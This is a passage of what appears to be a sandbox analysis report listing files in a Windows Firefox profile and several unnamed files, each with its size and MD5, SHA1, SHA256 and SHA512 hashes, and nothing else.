SHA5122cafc955d251521540e7e7009cbb9788a520d179f74feabbc8923c52645e69c7fe06e2ff85ac51d642fae5b0d9b14b3f49b017edac7f26445e1b6fdd170f0c85
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD59d3a621e2e05fc1cc1fa5edd9b42368c
SHA1684812cce9a3aceb7827e2335a0249106cdfe3d1
SHA256fab079cc6cf9756f0a9d28f22bee42566329765713365aa7b2c32152b522cab9
SHA512fb672eb862e38d9fb9115449da19c9ae094627d54c31358df0be98528165a4e28309768acf1917a596bbd106775e312f3e241982a7f069e3746a9e0749fd7f2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD5462e9f1795246c59aeb896d95c05504c
SHA1ba3a5513eaf5337fb43ec28fa64ae1438a2640ca
SHA256637a7d22dfe1f350f60d3840c443337a475c207ad2aa66e5d30b909506033101
SHA51235c982a3523d0d17a2789eb91101c6d1ce342de9c963aedf6f7613d6a33356e1fc773ded58e2e223ea172c0c7babc7acfb81594f2c595f915579f01aeba200da
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\datareporting\glean\pending_pings\175fb34f-b558-40eb-802e-8b4011e3f6c7
Filesize982B
MD5aac264af14dc85553a60295a95a5d142
SHA18e56d0d3496ff9dd92d78ed6f05f8d88b46fd291
SHA256f5b226e673673d8b86d886feae905dfb6e9a6884352b2736021d6b93a8d0ccfe
SHA512f9259811a2f7c562e668ef2362814455d599a1aa10869fa8a8f56acc4003257832e887e05050d3b5b1da850d16203000422722721e519e5aec415543ec52e8f3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\datareporting\glean\pending_pings\c1d8c3e1-160b-4d97-b0d5-d3c4b89e9ce8
Filesize659B
MD5873b939520845599f135067a87769642
SHA1ecccc1b41782007d081b8a5b91ec29f8abfde142
SHA25691484d00a4974270301a78c91a75c9f5f7b2aace49460e5322d83cfd324a3baf
SHA512516da27b065809ea678658e89ff590544c9364b8008bd06bb705a1a23c55e13a84b56e9f048d925b96c83212c4b8fadebec8449dddd31ef3c2f016ad1774bb19
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
5.0MB
MD5517a5c12e5b0be90605108688b5406ec
SHA17fa04d7dcdd9b56c24282046f2affec7852f6613
SHA256be067852ced315e916f82e96e586246fcac08037bcdc04a8809cea7cfa0ca527
SHA512074c7088d37503b71540616263306169247fc003408803ab8587f58ed83e45f649bdea0f484b5c2bc229f2dd14e3c5b093304a8bf25f215661952e69145f94ce
-
Filesize
9KB
MD58cd461a8db402faf00dd6b55fdf3b05e
SHA1e59997e8c213255bc235b114a914b707dca09898
SHA256e27bc436f78cf3cf62fee82d589f243d38aec9e453851edf47843d090e39ed71
SHA5128d8a5fc9fec8f7ce4711b5eb9cf21c90455f1d69fb550d8d5ee109d25e78e8480c774b11137ce4b41cf6b80336212a343bb4d96d6954436279831a1d7ba65346
-
Filesize
10KB
MD5a467e212cbe8a3f2bc52c0d97b220b55
SHA1bec66c3f57f1dc4161f783231a40d55cdae34dfd
SHA256deaf21890566df7c9ad35339051341db9207f96c2adb10a77e919ba6bbf1499a
SHA512c119142736ab506eaaf9c48f2f18b0ca11847717bdb0bd18d4338872a17c8371e8c5006c8d5dc03a59024deb0305c7f7219ca7c78fe481389c09dd1c32201261
-
Filesize
9KB
MD5699008c888c702944c9738fde4793e14
SHA1a523d59794b17366738575bfa9929b493737dfba
SHA256f7839f79ab7d9238c7d17d2d8ead5415b353dc8f22d23de1ea228bc2f9098471
SHA5124dcab17120264619bf77867678cc9162b70bed2207c3ec321770785efed5c112e4d223a48acafcfe4c947b492a7cf2e20794af26a2046ef7158c773503f8b53e
-
Filesize
10KB
MD50fff88f18d6f43bd812403c7e83452f8
SHA1fe05984d2581fb5b0e51e9f4fa3d4a8be3b3003c
SHA2560204fee90fb87986bd2e90e19aac41073e0c5f15ff768192d9a13ef6b96a1203
SHA512f66422aac9dac73214ac0a4da5c960e85adc9e9a569a8f8e7f9ef9e234ad416618323df4bbb019b4bdabe2d7a9466897a15d9f3a9d46d952f905030104debc0b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD52ed39dfbbbdf3658818a439827f192c8
SHA1129d38e4a62774da1d4093ee8ddf50e8a9d0279b
SHA2564bc015faee2ec27e79f11af3453df521e8476ab4192e7cd8bde55979a7609e54
SHA51224106c098844eb631f3c43cd09ac363849303bc8a9764175c91af3932f3cf2d35e7f675a771bb07791b93b9334a6b635b04312a1f040fb79cc5ef9f2c79d563f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\sessionstore-backups\recovery.baklz4
Filesize9KB
MD57d0b6f165609881865e5dc2637f84eeb
SHA1746760827e259190750c98e5bd843fba95abd44c
SHA256b9a0ac0cfdd5a16b12a1c721c7052fedbd9d7414b0909b48ba9a172501fdbed5
SHA5122b54a61d1fd5087976deb98517732744261b1b082b47f7bfc2917acb002ed1d23f5e3993a21328559c0637237d5aba6d8ff6feb7cfc9f9e647804603e1df04bf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\sessionstore-backups\recovery.baklz4
Filesize4KB
MD571be6d1e3581b6476c5bc31ee4272f78
SHA1cde4d84e6bd7bd498e888ec22c7c14c3c6861a9c
SHA256c2626513bb9345ad663860483af166899aa4053d24d1b965b279cf63c877166b
SHA512a63821acaa8e20133d71d8acb39c6df93fa2967a7bd443917a2db953b4f25caa88fe719a506724b91b4f0bcfa8dbffd81e9ac1bcecedf17e269679a97a12552a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ysnifzz6.default-release\sessionstore-backups\recovery.baklz4
Filesize13KB
MD5df7fd2c3b676287da95adb8d59da1eac
SHA1b1dff20aa8a0eb5337a60c2d0b0b428492636875
SHA256a3ed015808146e0506e8f010876e02c17bd9aed849a86ed946a910e135e83fe8
SHA512f30909538b53013b2c92f3e4072211b62e26f70ea08654a41ffe7676fe02b25b49a68dd7da92d7f9f6e0791b16ff288758fa5632d8801b39ae7e988d70aead94
-
Filesize
8KB
MD569994ff2f00eeca9335ccd502198e05b
SHA1b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA2562e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
Filesize
761KB
MD5c6040234ee8eaedbe618632818c3b1b3
SHA168115f8c3394c782aa6ba663ac78695d2b80bf75
SHA256bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0
SHA512a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf
-
Filesize
188KB
MD5918a571bfbc16e88f1abd23ebbade166
SHA1d36c0de4368efa2bb733969208d0a3449f21afdc
SHA256819d0b70a905ae5f8bef6c47423964359c2a90a168414f5350328f568e1c7301
SHA512088202b310fea6ab6b92188d9be958eb3b9a078712002be38f7b23e7f91a629bb7fcd54bc6859d163496941c02addfa99cbcdf672d735dff4b89e5ae857e7d82
-
Filesize
72KB
MD529fd97e2ce44268ccac3ebc2bd8ed78c
SHA198d3df4d3678f2efd998f62a09ec60166f8b209b
SHA2563d6315fa786c82b89db895d8ef45f65eba125b61206d46fe3abbaa7719b85e55
SHA5126928cb2c1c0a472b009e6310aedaca572027f96c42d39733b9be9b7adfee6ad39e7c1e0ecc664d865cec1618b383f79baeae20be386ba76d30e3f992b76a92e2
-
Filesize
1.4MB
MD556398c3eb7453017af674ab85df17386
SHA171c11988a7a14e2257a91bcc5efa85520540aa5c
SHA25642379bb392751f6a94d08168835b67986c820490a6867c28a324a807c49eda3b
SHA5120b124dc19a119b2a3235c26ba22e90d14744960d614598613d787cfb834087a2476141610910b7e2e1bb186257bdd3a2471c664a9378b9bb65437c7089edf399
-
Filesize
45KB
MD5f53df3d1d050644762fcb2b3a697c7d3
SHA1c1bccfdf62c6e55df6d7a203366f46ac3fca9917
SHA25660336b211d156dfd0502c00083c9e3b216e5c00046a8a1a066d6eff7e9cb0f87
SHA5120c895e341fb55baeec0582a435979e8d489c096248aa33ce95930435f57fc8b7ff219a2aab92d38e5e997649187e25b2e7be9d0df538e9d5468980e2ebc7bddd
-
Filesize
45KB
MD5b6811a1daca8cfda16da0f730c174133
SHA192d67d3836def51f5a45389692292b2998a0c559
SHA256d5619e740a38ee0c894dd17051419306c4b35ad55a1558854ed82527a4aa736c
SHA512c1fe4b8edc38eef9ce12ae56f7874690b50519b12560620766c7e0b9f6a8cf1f9d00f648f6fa15b328320435e013bccae2dd2195985d8121ffc3c16b521b857d
-
Filesize
623KB
MD5b2bc8927f304c1acba200ca834fd209e
SHA12f634e6d4032df2d691193eeef2598bc9895a8bc
SHA256bde704fafea6a56c698e22a4fb506942f6cc76129736af8ea94567de2ad7ec0b
SHA512d843691c836ec7c465683784d386e21b1a666e735f58631d40c36b8ec807759271c860efdfdc1b62ad92a3cb6c466be7fea86ef85544a2881753288d89c9f2fc
-
Filesize
3.4MB
MD5d59e32eefe00e9bf9e0f5dafe68903fb
SHA199dc19e93978f7f2838c26f01bdb63ed2f16862b
SHA256e06aa8ce984b22dd80a60c1f818b781b05d1c07facc91fec8637b312a728c145
SHA51256a3790205885d12252109fdf040e5527fad8a11811e7471e7d406781c9bb4e3514b074daf933a3865de03f99cd13d93203d5478a69e87692cdd016741b73587
-
Filesize
1.9MB
MD5a44ef99c46e19497ffb2584c3d2ea1de
SHA1fdca13587ccd778dfbbb3d2563f0adb8e09d5db2
SHA256f0980fa71cd00c985106ca262d274408ee7a1de943e3a87b4d1133480c01c6ce
SHA512712c66af5ff32af1b6c9970eb8f8a3c0587c9e42344ce61483de92b9f2eb43b50afa6e1f23d0c79af79e29dbbfcca65e1c5f04a55c6c3cc498347d1b5fded7b7
-
Filesize
3.1MB
MD557145c33045ce67e1c1fe7c763438ab1
SHA12a83ecef8bbe640577a2cc3f6602bbd8e7d6c847
SHA2569764bc832bfa8a9f3d7af1ea6747e7376774bd903e9cc545d9998f2657e97fa3
SHA5127ce3d6dbd3c3b05ff6fe1ac57888123cf5e01e890c5b5e7204859b361841d15fdb8a460626355236b9c3df58824cb1979c187f34fa6d7d282517023f3a26a112
-
Filesize
300KB
MD59848b927987f298730db70a89574fdad
SHA1c7c60e246f5025ca90622ca0eca8749452bab43e
SHA256984bfd0f35280b016c3385527d3eec75afe765bb13c67059d1d2aa31673cec04
SHA512613b646775e89039ac2107e229269228999cdc6cb691251b2e95dab7e8308c105f132a51ed0fd56cc8c756388956cb375f921142e57936bed35f3c2f41a19cda
-
Filesize
300KB
MD5b37933f48d0b61450c6729cae4792eb1
SHA13845acf08857bba33c954ce4756ae1e6ca9849e0
SHA25639ced9ce7f72d80de250324b40971e5dace016a0352e4ab8e80e02b227c6e63d
SHA512632d74e4997e5d2b9b03be1588939ec7ae0c58af96039ff62380f6d6c21d6325a8612685127120e5858582adc7a3f54e27c53e47b5777298aa09b7404f2384b7
-
Filesize
1.2MB
MD5cbe4555f52604d8280cbbd4b6797ea49
SHA19413e72947f3b5af4c832977595183d819264019
SHA25698ab39899d3da5cfeebf609ec20979b51aab6e1dbd7b22ac14b3f2017d14cfc3
SHA512adba3fbc2eb0ab0395a83eae7c65900461070ce999fdb00589a3c458a1e98bd05331b140c7be3334bd5baf5a7636e150fa1a951498bd9d279c5151f9e2944fde
-
Filesize
2.7MB
MD5990a3f3b1273510f210fb9b541da219f
SHA133e536c5b4bdb6f6042f93445dffd8a3ad488e8b
SHA25635a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c
SHA512495734313cae980d3f48ef78422cf9484eb347833672fd5c693f8f8c92c1c0d51986795cd55a3148be18ff0c9d36adff5a1c3ff18200668dd33f3978a459c246
-
Filesize
1.2MB
MD50f034796dc81d056350d39ee443d62c0
SHA126b1e7814c078f9fc13a0da468b3b2bf10fdd577
SHA256a054fad4e6d702af134d346f139c70233dc09a6404e9522eebfb86a11f227646
SHA51296e6577b479389de9cb2e985ffcec01c5b1797287fe5e93009df4c4bdb9a78b8fdfcca18329077d13a47834a4f7aa3c09f43f7b36841f0712a8490b91b16d8f7
-
Filesize
45KB
MD5b525ea79a587def213905cf77f2b5e7e
SHA108211f74b221764ad5e0ff24c914c8d8bf0fdedb
SHA2567d11842cce74194adfff7709d7ba3f560dd381dc05b79810ac5c08bb220e6556
SHA512dc9ff41591b455589a97f09245b2a70fccb1a68f1176696f386b634511f8498df8d549d9e931919c7e598586251a6552f118f0a439e4e708568afb7a0e7f46b1
-
Filesize
43KB
MD5587b41a4b882a71a5e8e1ed72f9514a1
SHA1274674cac5c4dbb17f84c8b8c26a741e424d89f5
SHA2564160cb40509ff8d695b3a0c5f05fe83ab0b713036aa864504af1050b9253ad48
SHA512b484eda2e07c878fb85778aabf8c53619a407024d20cc6837994418b0500366e7f8f668a7547f6c944488611d6696eb3a3624cc2a5f74df9827a956c525c42d4
-
Filesize
348KB
MD5d92b40747b5d7d55af91583f44f23fd9
SHA12e8ff2af588150d868d3c9bd735a5f1d4b966e27
SHA2561e68461dbed6cc77c53808defed0071b243a9fbae1bf36576a124d843ebfe0eb
SHA512c357f9ad39f71d68a37edc346cfdb7f957bd65e2b53bc31e2cae1cc12e0ad9ad245ca4d959bd4b2a9be4d8a7df019de6d4332f88d60552692811c4cf8fc2a9d0
-
Filesize
3.1MB
MD5d0d7ab7998eee34f17c5299b2e5369d8
SHA16c1d3438adeb0b7f21be3c881be8fbee01b4e4f4
SHA2563864d360423959f1c229abd6db2a8b94c197910296c20661c4736102a388112f
SHA512fcec45df80bbe966817e468d3a4b56fb5d67d3472bc60f49cc25e86099b91f566ed1627e4f33b1ee037726e431af11c267bdd6d22518daf4489b6272f0d29304
-
Filesize
9.1MB
MD5cb166d49ce846727ed70134b589b0142
SHA18f5e1c7792e9580f2b10d7bef6dc7e63ea044688
SHA25649da580656e51214d59702a1d983eff143af3560a344f524fe86326c53fb5ddb
SHA512a39bd86a148af26fd31a0d171078fb7bce0951bb8ea63658d87f6bde97dbc214c62e8bd7152d1e621051de8a0ba77ffd7bda7c1106afb740584c80e68e1912ed
-
Filesize
2KB
MD5f9ad448d54173734e98471af60a4662f
SHA1b843a02d54342c7eaa7658ea8d5b4f255919f117
SHA2562fa15381c7b8a226520756b65c6c48a9f385e1929a631d576e3ad9125a25d09d
SHA512f4468af027ad7752fb464fdbc473eeffffc96348e9f31ae11e1e5d077be95c57f07c4d52d6ccf7c7090c60383c17388a6e0b415046c04344c115268bd243892a
-
Filesize
6.1MB
MD5f6d520ae125f03056c4646c508218d16
SHA1f65e63d14dd57eadb262deaa2b1a8a965a2a962c
SHA256d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1
SHA512d1ec3da141ce504993a0cbf8ea4b719ffa40a2be4941c18ffc64ec3f71435f7bddadda6032ec0ae6cada66226ee39a2012079ed318df389c7c6584ad3e1c334d